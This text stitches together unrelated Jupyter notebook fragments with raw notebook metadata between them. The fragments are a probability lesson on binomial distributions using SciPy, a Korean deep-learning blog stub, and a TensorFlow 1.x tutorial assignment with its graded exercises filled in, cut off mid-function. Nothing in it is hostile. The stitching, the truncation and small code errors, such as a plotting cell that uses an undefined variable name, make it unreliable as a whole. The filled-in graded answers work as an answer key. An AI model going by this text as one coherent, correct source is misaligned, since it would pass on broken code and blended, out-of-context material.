Our formula says\n$$\nP(S_n = 0) = \\frac{n!}{0!(n-0)!} p^0 (1-p)^{n-0} = (1-p)^n\n$$\nafter all the dust clears in the formula; the first two factors are both 1. You can check that $P(S_n = n) = p^n$, the\nchance that all the trials are successes.\n\nRemember that $0! = 1$ by definition. In part, it is defined that way to make the formula for $\\binom{n}{k}$ work out correctly when $k=0$. \n\n- The probabilities in the distribution sum to 1. To see this, recall that for any two numbers $a$ and $b$,\n\n\\begin{align*}\n(a+b)^2 &= a^2 + 2ab + b^2 \\\\\n(a+b)^3 &= a^3 + 3a^2b + 3ab^2 + b^3 \\\\\n\\ldots \\\\\n(a+b)^n &= \\sum_{k=0}^n \\binom{n}{k} a^k b^{n-k}\n\\end{align*}\n\nby the *binomial expansion* of $(a+b)^n$. The numbers $\\binom{n}{k}$ are the elements of Pascal's triangle, as you will have seen in a math class.\n\nPlug in $a = p$ and $b = 1-p$ and notice that the terms in the sum are exactly the binomial probabilities we defined above. So the sum of the probabilities is\n\n$$\n\\sum_{k=0}^n \\binom{n}{k} p^k (1-p)^{n-k}\n~ = ~ \\big{(} p + (1-p) \\big{)}^n ~ = ~ 1^n ~ = ~ 1\n$$", "_____no_output_____" ], [ "### Binomial Probabilities in Python ###\n`SciPy` is a system for scientific computing, based on Python. The `stats` submodule of `scipy` does numerous calculations in probability and statistics. We will be importing it at the start of every notebook from now on.", "_____no_output_____" ] ], [ [ "from scipy import stats", "_____no_output_____" ] ], [ [ "The function `stats.binom.pmf` takes three arguments: $k$, $n$, and $p$, in that order. 
It returns the numerical value of $P(S_n = k)$ For short, we will say that the function returns the binomial $(n, p)$ probability of $k$.\n\nThe acronym \"pmf\" stands for \"probability mass function\" which as we have noted earlier is sometimes used as another name for the distribution of a variable that has finitely many values.\n\nThe chance of 3 sixes in 7 rolls of a die is\n$\\binom{7}{3}(1/6)^3(5/6)^4$ by the binomial formula, which works out to about 8% by the calculation below.", "_____no_output_____" ] ], [ [ "stats.binom.pmf(3, 7, 1/6)", "_____no_output_____" ] ], [ [ "You can also specify an array or list of values of $k$, and `stats.binom.pmf` will return an array consisting of all their probabilities.", "_____no_output_____" ] ], [ [ "stats.binom.pmf([2, 3, 4], 7, 1/6)", "_____no_output_____" ] ], [ [ "Thus to find $P(2 \\le S_7 \\le 4)$, you can use", "_____no_output_____" ] ], [ [ "sum(stats.binom.pmf([2, 3, 4], 7, 1/6))", "_____no_output_____" ] ], [ [ "### Binomial Histograms ###\nTo visualize binomial distributions we will use the `prob140` method `Plot`, by first using `stats.binom.pmf` to calculate the binomial probabilities. The cell below plots the distribution of $S_7$ above. Notice how we start by specifying all the possible values of $S_7$ in the array `k`.", "_____no_output_____" ] ], [ [ "n = 7\np = 1/6\nk = np.arange(n+1)\nbinom_7_1_6 = stats.binom.pmf(k, n, p)\nbinom_7_1_6_dist = Table().values(k).probability(binom_7_1_6)\nPlot(binom_7_1_6_dist)", "_____no_output_____" ] ], [ [ "Not surprisingly, the graph shows that in 7 rolls of a die you are most likely to get around 1 six.\n\nThis distribution is not symmetric, as you would expect. 
But something interesting happens to the distribution of the number of sixes when you increase the number of rolls.", "_____no_output_____" ] ], [ [ "n = 600\np = 1/6\nk = np.arange(n+1)\nbinom_600_1_6 = stats.binom.pmf(k, n, p)\nbinom_600_1_6_dist = Table().values(k).probability(binom_600_1_6)\nPlot(binom_600_1_6_dist)", "_____no_output_____" ] ], [ [ "This distribution is close to symmetric, even though the die has only a 1/6 chance of showing a six.\n\nAlso notice that while the the *possible* values of the number of sixes range from 0 to 600, the *probable* values are in a much smaller range. The `plt.xlim` function allows us to zoom in on the probable values. The semicolon is just to prevent Python giving us a message that clutters up the graph. The `edges=True` option forces `Plot` to draw lines separating the bars; by default, it stops doing that if the number of bars is large.", "_____no_output_____" ] ], [ [ "Plot(binom_600_16_dist, edges=True)\nplt.xlim(70, 130);", "_____no_output_____" ] ], [ [ "But the binomial $(n, p)$ distribution doesn't always look bell shaped if $n$ is large.\n\nSomething quite different happens if for example your random variable is the number of successes in 600 independent trials that have probability 1/600 of success on each trial. Then the distribution of the number of successes is binomial $(600, 1/600)$, which looks like this:", "_____no_output_____" ] ], [ [ "n = 600\np = 1/600\nk = np.arange(n+1)\nbinom_600_1_600 = stats.binom.pmf(k, n, p)\nbinom_600_1_600_dist = Table().values(k).probability(binom_600_1_600)\nPlot(binom_600_1_600_dist)", "_____no_output_____" ] ], [ [ "We really can't see that at all! Let's zoom in. 
When we set the limits on the horizontal axis, we have to account for the bar at 0 being centered at the 0 and hence starting at -0.5.", "_____no_output_____" ] ], [ [ "Plot(binom_600_1_600_dist, edges=True)\nplt.xlim(-1, 10);", "_____no_output_____" ] ], [ [ "Now you can see that in 600 independent trials with probability 1/600 of success on each trial, you are most likely to get no successes or 1 success. There is some chance that you get 2 through 4 successes, but the chance of any number of successes greater than 4 is barely visible on the scale of the graph.\n\nClearly, the shape of the histogram is determined by both $n$ and $p$. We will study the shape carefully in an upcoming section. But first let's see some numerical examples of using the binomial distribution.", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72d585f769d74e29733f2f7b8d8937dadefee8a
1,276
ipynb
Jupyter Notebook
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
16.151899
41
0.466301
[ [ [ "# Chapter 1\n\n- toc: true \n- badges: true\n- comments: true\n- categories: [Python,Deeplearning]", "_____no_output_____" ], [ "### 1.1 신경망 연구의 역사", "_____no_output_____" ], [ "1.1.1 다층 신경망에 대한 기대와 실망", "_____no_output_____" ] ], [ [ "- (1)", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72d6d0c5f2a2179094e606d2b455ecb0b692e39
4,252
ipynb
Jupyter Notebook
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
1
2018-06-17T14:42:52.000Z
2018-06-17T14:42:52.000Z
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
null
null
null
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
null
null
null
22.983784
127
0.489887
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72d73846d3e91747eb82847ca767df40cb1c0f9
30,244
ipynb
Jupyter Notebook
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
null
null
null
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
4
2020-09-24T01:54:32.000Z
2022-02-26T09:58:53.000Z
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
1
2020-10-01T12:12:02.000Z
2020-10-01T12:12:02.000Z
86.411429
20,448
0.821088
[ [ [ "# \"Neural Network Visualizer Streamlit App\"\n> Visualize the predictions of your intermediate neural network layers\n\n- toc: false\n- branch: master\n- badges: true\n- comments: true\n- categories: [visualization, streamlit, explainable-AI]\n- image: images/some_folder/your_image.png\n- hide: false\n- search_exclude: true", "_____no_output_____" ], [ "# Import Libraries", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "# Download Data", "_____no_output_____" ] ], [ [ "(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()", "_____no_output_____" ] ], [ [ "# Plot Examples", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10, 10))\n\nfor i in range(16):\n plt.subplot(4, 4, i + 1)\n plt.imshow(x_train[i], cmap='binary')\n plt.xlabel(str(y_train[i]))\n plt.xticks([])\n plt.yticks([])\nplt.show()", "_____no_output_____" ] ], [ [ "# Normalize Data", "_____no_output_____" ] ], [ [ "x_train = np.reshape(x_train, (60000, 784))\nx_train = x_train / 255.\n\nx_test = np.reshape(x_test, (10000, 784))\nx_test = x_test / 255.", "_____no_output_____" ] ], [ [ "# Create a Neural Network Model", "_____no_output_____" ] ], [ [ "model = tf.keras.models.Sequential([\n tf.keras.layers.Dense(32, activation='sigmoid', input_shape=(784,)),\n tf.keras.layers.Dense(32, activation='sigmoid'),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "# Train the Model", "_____no_output_____" ] ], [ [ "_ = model.fit(\n x_train, y_train,\n validation_data=(x_test, y_test),\n epochs=20, batch_size=1024,\n verbose=2\n)", "Train on 60000 samples, validate on 10000 samples\nEpoch 1/20\n60000/60000 - 1s - loss: 2.1994 - accuracy: 0.3593 - val_loss: 1.9857 - val_accuracy: 0.6710\nEpoch 2/20\n60000/60000 - 0s - loss: 1.7957 - 
accuracy: 0.6828 - val_loss: 1.5774 - val_accuracy: 0.7260\nEpoch 3/20\n60000/60000 - 0s - loss: 1.3886 - accuracy: 0.7427 - val_loss: 1.1907 - val_accuracy: 0.7763\nEpoch 4/20\n60000/60000 - 0s - loss: 1.0471 - accuracy: 0.7973 - val_loss: 0.9006 - val_accuracy: 0.8376\nEpoch 5/20\n60000/60000 - 0s - loss: 0.8084 - accuracy: 0.8505 - val_loss: 0.7101 - val_accuracy: 0.8699\nEpoch 6/20\n60000/60000 - 0s - loss: 0.6540 - accuracy: 0.8751 - val_loss: 0.5875 - val_accuracy: 0.8869\nEpoch 7/20\n60000/60000 - 0s - loss: 0.5524 - accuracy: 0.8868 - val_loss: 0.5048 - val_accuracy: 0.8963\nEpoch 8/20\n60000/60000 - 0s - loss: 0.4820 - accuracy: 0.8960 - val_loss: 0.4462 - val_accuracy: 0.9027\nEpoch 9/20\n60000/60000 - 0s - loss: 0.4308 - accuracy: 0.9015 - val_loss: 0.4034 - val_accuracy: 0.9095\nEpoch 10/20\n60000/60000 - 0s - loss: 0.3921 - accuracy: 0.9065 - val_loss: 0.3702 - val_accuracy: 0.9132\nEpoch 11/20\n60000/60000 - 0s - loss: 0.3617 - accuracy: 0.9112 - val_loss: 0.3445 - val_accuracy: 0.9165\nEpoch 12/20\n60000/60000 - 0s - loss: 0.3370 - accuracy: 0.9163 - val_loss: 0.3224 - val_accuracy: 0.9196\nEpoch 13/20\n60000/60000 - 0s - loss: 0.3161 - accuracy: 0.9201 - val_loss: 0.3045 - val_accuracy: 0.9222\nEpoch 14/20\n60000/60000 - 0s - loss: 0.2985 - accuracy: 0.9229 - val_loss: 0.2908 - val_accuracy: 0.9255\nEpoch 15/20\n60000/60000 - 0s - loss: 0.2832 - accuracy: 0.9269 - val_loss: 0.2765 - val_accuracy: 0.9275\nEpoch 16/20\n60000/60000 - 0s - loss: 0.2697 - accuracy: 0.9294 - val_loss: 0.2664 - val_accuracy: 0.9297\nEpoch 17/20\n60000/60000 - 0s - loss: 0.2578 - accuracy: 0.9319 - val_loss: 0.2546 - val_accuracy: 0.9324\nEpoch 18/20\n60000/60000 - 0s - loss: 0.2469 - accuracy: 0.9348 - val_loss: 0.2455 - val_accuracy: 0.9350\nEpoch 19/20\n60000/60000 - 0s - loss: 0.2372 - accuracy: 0.9377 - val_loss: 0.2371 - val_accuracy: 0.9371\nEpoch 20/20\n60000/60000 - 0s - loss: 0.2283 - accuracy: 0.9393 - val_loss: 0.2289 - val_accuracy: 0.9386\n" ] ], [ [ "# Save 
the Model", "_____no_output_____" ] ], [ [ "model.save('model.h5')", "_____no_output_____" ] ], [ [ "## ml_server.py", "_____no_output_____" ] ], [ [ "import json\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport random\nimport string\n\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\nmodel = tf.keras.models.load_model('model.h5')\nfeature_model = tf.keras.models.Model(model.inputs, [layer.output for layer in model.layers])\n\n_, (x_test, _) = tf.keras.datasets.mnist.load_data()\nx_test = x_test / 255.\n\ndef get_prediction():\n index = np.random.choice(x_test.shape[0])\n image = x_test[index,:,:]\n image_arr = np.reshape(image, (1, 784))\n return feature_model.predict(image_arr), image\n\[email protected]('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n preds, image = get_prediction()\n final_preds = [p.tolist() for p in preds]\n return json.dumps({'prediction': final_preds, 'image': image.tolist()})\n return 'Welcome to the ml server'\n\nif __name__ == '__main__':\n app.run()\n", "_____no_output_____" ] ], [ [ "## app.py", "_____no_output_____" ] ], [ [ "import requests\nimport json\nimport numpy as np\nimport streamlit as st\nimport os\nimport matplotlib.pyplot as plt\n\nURI = 'http://127.0.0.1:5000'\n\nst.title('Neural Network Visualizer')\nst.sidebar.markdown('# Input Image')\n\nif st.button('Get random predictions'):\n response = requests.post(URI, data={})\n # print(response.text)\n response = json.loads(response.text)\n preds = response.get('prediction')\n image = response.get('image')\n image = np.reshape(image, (28, 28))\n\n st.sidebar.image(image, width=150)\n\n for layer, p in enumerate(preds):\n numbers = np.squeeze(np.array(p))\n\n plt.figure(figsize=(32, 4))\n\n if layer == 2:\n row = 1\n col = 10\n else:\n row = 2\n col = 16\n\n for i, number in enumerate(numbers):\n plt.subplot(row, col, i + 1)\n plt.imshow((number * np.ones((8, 8, 3))).astype('float32'), cmap='binary')\n plt.xticks([])\n 
plt.yticks([])\n if layer == 2:\n plt.xlabel(str(i), fontsize=40)\n plt.subplots_adjust(wspace=0.05, hspace=0.05)\n plt.tight_layout()\n\n st.text('Layer {}'.format(layer + 1), )\n st.pyplot()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72d8fe3b6fdccd3242d7da11705a557b3c14f53
97,092
ipynb
Jupyter Notebook
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
53.347253
18,604
0.69464
[ [ [ "# TensorFlow Tutorial\n\nWelcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow: \n\n- Initialize variables\n- Start your own session\n- Train algorithms \n- Implement a Neural Network\n\nPrograming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. ", "_____no_output_____" ], [ "## <font color='darkblue'>Updates</font>\n\n#### If you were working on the notebook before this update...\n* The current notebook is version \"v3b\".\n* You can find your original work saved in the notebook with the previous version name (it may be either TensorFlow Tutorial version 3\" or \"TensorFlow Tutorial version 3a.) \n* To view the file directory, click on the \"Coursera\" icon in the top left of this notebook.\n\n#### List of updates\n* forward_propagation instruction now says 'A1' instead of 'a1' in the formula for Z2; \n and are updated to say 'A2' instead of 'Z2' in the formula for Z3.\n* create_placeholders instruction refer to the data type \"tf.float32\" instead of float.\n* in the model function, the x axis of the plot now says \"iterations (per fives)\" instead of iterations(per tens)\n* In the linear_function, comments remind students to create the variables in the order suggested by the starter code. 
The comments are updated to reflect this order.\n* The test of the cost function now creates the logits without passing them through a sigmoid function (since the cost function will include the sigmoid in the built-in tensorflow function).\n* In the 'model' function, the minibatch_cost is now divided by minibatch_size (instead of num_minibatches).\n* Updated print statements and 'expected output that are used to check functions, for easier visual comparison.\n", "_____no_output_____" ], [ "## 1 - Exploring the Tensorflow Library\n\nTo start, you will import the library:", "_____no_output_____" ] ], [ [ "import math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict\n\n%matplotlib inline\nnp.random.seed(1)", "_____no_output_____" ] ], [ [ "Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. \n$$loss = \\mathcal{L}(\\hat{y}, y) = (\\hat y^{(i)} - y^{(i)})^2 \\tag{1}$$", "_____no_output_____" ] ], [ [ "y_hat = tf.constant(36, name='y_hat') # Define y_hat constant. Set to 36.\ny = tf.constant(39, name='y') # Define y. Set to 39\n\nloss = tf.Variable((y - y_hat)**2, name='loss') # Create a variable for the loss\n\ninit = tf.global_variables_initializer() # When init is run later (session.run(init)),\n # the loss variable will be initialized and ready to be computed\nwith tf.Session() as session: # Create a session and print the output\n session.run(init) # Initializes the variables\n print(session.run(loss)) # Prints the loss", "9\n" ] ], [ [ "Writing and running programs in TensorFlow has the following steps:\n\n1. Create Tensors (variables) that are not yet executed/evaluated. \n2. Write operations between those Tensors.\n3. Initialize your Tensors. \n4. Create a Session. 
\n5. Run the Session. This will run the operations you'd written above. \n\nTherefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value.\n\nNow let us look at an easy example. Run the cell below:", "_____no_output_____" ] ], [ [ "a = tf.constant(2)\nb = tf.constant(10)\nc = tf.multiply(a,b)\nprint(c)", "Tensor(\"Mul:0\", shape=(), dtype=int32)\n" ] ], [ [ "As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type \"int32\". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it.", "_____no_output_____" ] ], [ [ "sess = tf.Session()\nprint(sess.run(c))", "20\n" ] ], [ [ "Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. \n\nNext, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later. \nTo specify values for a placeholder, you can pass in values by using a \"feed dictionary\" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session. ", "_____no_output_____" ] ], [ [ "# Change the value of x in the feed_dict\n\nx = tf.placeholder(tf.int64, name = 'x')\nprint(sess.run(2 * x, feed_dict = {x: 3}))\nsess.close()", "6\n" ] ], [ [ "When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. 
\n\nHere's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph.", "_____no_output_____" ], [ "### 1.1 - Linear function\n\nLets start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. \n\n**Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):\n```python\nX = tf.constant(np.random.randn(3,1), name = \"X\")\n\n```\nYou might find the following functions helpful: \n- tf.matmul(..., ...) to do a matrix multiplication\n- tf.add(..., ...) to do an addition\n- np.random.randn(...) to initialize randomly\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: linear_function\n\ndef linear_function():\n \"\"\"\n Implements a linear function: \n Initializes X to be a random tensor of shape (3,1)\n Initializes W to be a random tensor of shape (4,3)\n Initializes b to be a random tensor of shape (4,1)\n Returns: \n result -- runs the session for Y = WX + b \n \"\"\"\n \n np.random.seed(1)\n \n \"\"\"\n Note, to ensure that the \"random\" numbers generated match the expected results,\n please create the variables in the order given in the starting code below.\n (Do not re-arrange the order).\n \"\"\"\n X = tf.constant(np.random.randn(3, 1), name = 'X')\n W = tf.constant(np.random.randn(4, 3), name = 'W')\n b = tf.constant(np.random.randn(4, 1), name = 'b')\n Y = tf.constant(np.random.randn(4, 1), name = 'Y')\n \n # Create the session using tf.Session() and run it with sess.run(...) 
on the variable you want to calculate\n \n sess = tf.Session()\n result = sess.run(tf.add(tf.matmul(W, X), b))\n \n # close the session \n sess.close()\n\n return result", "_____no_output_____" ], [ "print( \"result = \\n\" + str(linear_function()))", "result = \n[[-2.15657382]\n [ 2.95891446]\n [-1.08926781]\n [-0.84538042]]\n" ] ], [ [ "*** Expected Output ***: \n\n```\nresult = \n[[-2.15657382]\n [ 2.95891446]\n [-1.08926781]\n [-0.84538042]]\n```", "_____no_output_____" ], [ "### 1.2 - Computing the sigmoid \nGreat! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise lets compute the sigmoid function of an input. \n\nYou will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. \n\n** Exercise **: Implement the sigmoid function below. 
You should use the following: \n\n- `tf.placeholder(tf.float32, name = \"...\")`\n- `tf.sigmoid(...)`\n- `sess.run(..., feed_dict = {x: z})`\n\n\nNote that there are two typical ways to create and use sessions in tensorflow: \n\n**Method 1:**\n```python\nsess = tf.Session()\n# Run the variables initialization (if needed), run the operations\nresult = sess.run(..., feed_dict = {...})\nsess.close() # Close the session\n```\n**Method 2:**\n```python\nwith tf.Session() as sess: \n # run the variables initialization (if needed), run the operations\n result = sess.run(..., feed_dict = {...})\n # This takes care of closing the session for you :)\n```\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: sigmoid\n\ndef sigmoid(z):\n \"\"\"\n Computes the sigmoid of z\n \n Arguments:\n z -- input value, scalar or vector\n \n Returns: \n results -- the sigmoid of z\n \"\"\"\n \n # Create a placeholder for x. Name it 'x'.\n x = tf.placeholder(tf.float32, name = 'x')\n\n # compute sigmoid(x)\n sigmoid = tf.sigmoid(x)\n\n # Create a session, and run it. Please use the method 2 explained above. \n # You should use a feed_dict to pass z's value to x. \n with tf.Session() as sess:\n # Run session and call the output \"result\"\n result = sess.run(sigmoid, feed_dict={x:z})\n\n \n return result", "_____no_output_____" ], [ "print (\"sigmoid(0) = \" + str(sigmoid(0)))\nprint (\"sigmoid(12) = \" + str(sigmoid(12)))", "sigmoid(0) = 0.5\nsigmoid(12) = 0.999994\n" ] ], [ [ "*** Expected Output ***: \n\n<table> \n<tr> \n<td>\n**sigmoid(0)**\n</td>\n<td>\n0.5\n</td>\n</tr>\n<tr> \n<td>\n**sigmoid(12)**\n</td>\n<td>\n0.999994\n</td>\n</tr> \n\n</table> ", "_____no_output_____" ], [ "<font color='blue'>\n**To summarize, you how know how to**:\n1. Create placeholders\n2. Specify the computation graph corresponding to operations you want to compute\n3. Create the session\n4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. 
", "_____no_output_____" ], [ "### 1.3 - Computing the Cost\n\nYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: \n$$ J = - \\frac{1}{m} \\sum_{i = 1}^m \\large ( \\small y^{(i)} \\log a^{ [2] (i)} + (1-y^{(i)})\\log (1-a^{ [2] (i)} )\\large )\\small\\tag{2}$$\n\nyou can do it in one line of code in tensorflow!\n\n**Exercise**: Implement the cross entropy loss. The function you will use is: \n\n\n- `tf.nn.sigmoid_cross_entropy_with_logits(logits = ..., labels = ...)`\n\nYour code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes\n\n$$- \\frac{1}{m} \\sum_{i = 1}^m \\large ( \\small y^{(i)} \\log \\sigma(z^{[2](i)}) + (1-y^{(i)})\\log (1-\\sigma(z^{[2](i)})\\large )\\small\\tag{2}$$\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: cost\n\ndef cost(logits, labels):\n \"\"\"\n    Computes the cost using the sigmoid cross entropy\n    \n    Arguments:\n    logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)\n    labels -- vector of labels y (1 or 0) \n \n Note: What we've been calling \"z\" and \"y\" in this class are respectively called \"logits\" and \"labels\" \n in the TensorFlow documentation. So logits will feed into z, and labels into y. \n    \n    Returns:\n    cost -- runs the session of the cost (formula (2))\n \"\"\"\n \n # Create the placeholders for \"logits\" (z) and \"labels\" (y) (approx. 2 lines)\n z = tf.placeholder(tf.float32, name = 'z')\n y = tf.placeholder(tf.float32, name = 'y')\n \n # Use the loss function (approx. 1 line)\n cost = tf.nn.sigmoid_cross_entropy_with_logits(logits = z, labels = y)\n \n # Create a session (approx. 1 line). See method 1 above.\n sess = tf.Session()\n \n # Run the session (approx. 
1 line).\n cost = sess.run(cost, feed_dict={z: logits, y: labels})\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return cost", "_____no_output_____" ], [ "logits = np.array([0.2,0.4,0.7,0.9])\n\ncost = cost(logits, np.array([0,0,1,1]))\nprint (\"cost = \" + str(cost))", "cost = [ 0.79813886 0.91301525 0.40318605 0.34115386]\n" ] ], [ [ "** Expected Output** : \n\n```\ncost = [ 0.79813886 0.91301525 0.40318605 0.34115386]\n```", "_____no_output_____" ], [ "### 1.4 - Using One Hot encodings\n\nMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:\n\n\n<img src=\"images/onehot.png\" style=\"width:600px;height:150px;\">\n\nThis is called a \"one hot\" encoding, because in the converted representation exactly one element of each column is \"hot\" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code. In tensorflow, you can use one line of code: \n\n- tf.one_hot(labels, depth, axis) \n\n**Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this. ", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: one_hot_matrix\n\ndef one_hot_matrix(labels, C):\n \"\"\"\n Creates a matrix where the i-th row corresponds to the ith class number and the jth column\n corresponds to the jth training example. So if example j had a label i. Then entry (i,j) \n will be 1. \n \n Arguments:\n labels -- vector containing the labels \n C -- number of classes, the depth of the one hot dimension\n \n Returns: \n one_hot -- one hot matrix\n \"\"\"\n \n # Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)\n C = tf.constant(C, name='C')\n \n # Use tf.one_hot, be careful with the axis (approx. 
1 line)\n one_hot_matrix = tf.one_hot(labels, C, axis=0)\n \n # Create the session (approx. 1 line)\n sess = tf.Session()\n \n # Run the session (approx. 1 line)\n one_hot = sess.run(one_hot_matrix)\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return one_hot", "_____no_output_____" ], [ "labels = np.array([1,2,3,0,2,1])\none_hot = one_hot_matrix(labels, C = 4)\nprint (\"one_hot = \\n\" + str(one_hot))", "one_hot = \n[[ 0. 0. 0. 1. 0. 0.]\n [ 1. 0. 0. 0. 0. 1.]\n [ 0. 1. 0. 0. 1. 0.]\n [ 0. 0. 1. 0. 0. 0.]]\n" ] ], [ [ "**Expected Output**: \n\n```\none_hot = \n[[ 0. 0. 0. 1. 0. 0.]\n [ 1. 0. 0. 0. 0. 1.]\n [ 0. 1. 0. 0. 1. 0.]\n [ 0. 0. 1. 0. 0. 0.]]\n```", "_____no_output_____" ], [ "### 1.5 - Initialize with zeros and ones\n\nNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. \n\n**Exercise:** Implement the function below to take in a shape and to return an array (of the shape's dimension of ones). \n\n - tf.ones(shape)\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: ones\n\ndef ones(shape):\n \"\"\"\n Creates an array of ones of dimension shape\n \n Arguments:\n shape -- shape of the array you want to create\n \n Returns: \n ones -- array containing only ones\n \"\"\"\n \n # Create \"ones\" tensor using tf.ones(...). (approx. 1 line)\n ones = tf.ones(shape)\n \n # 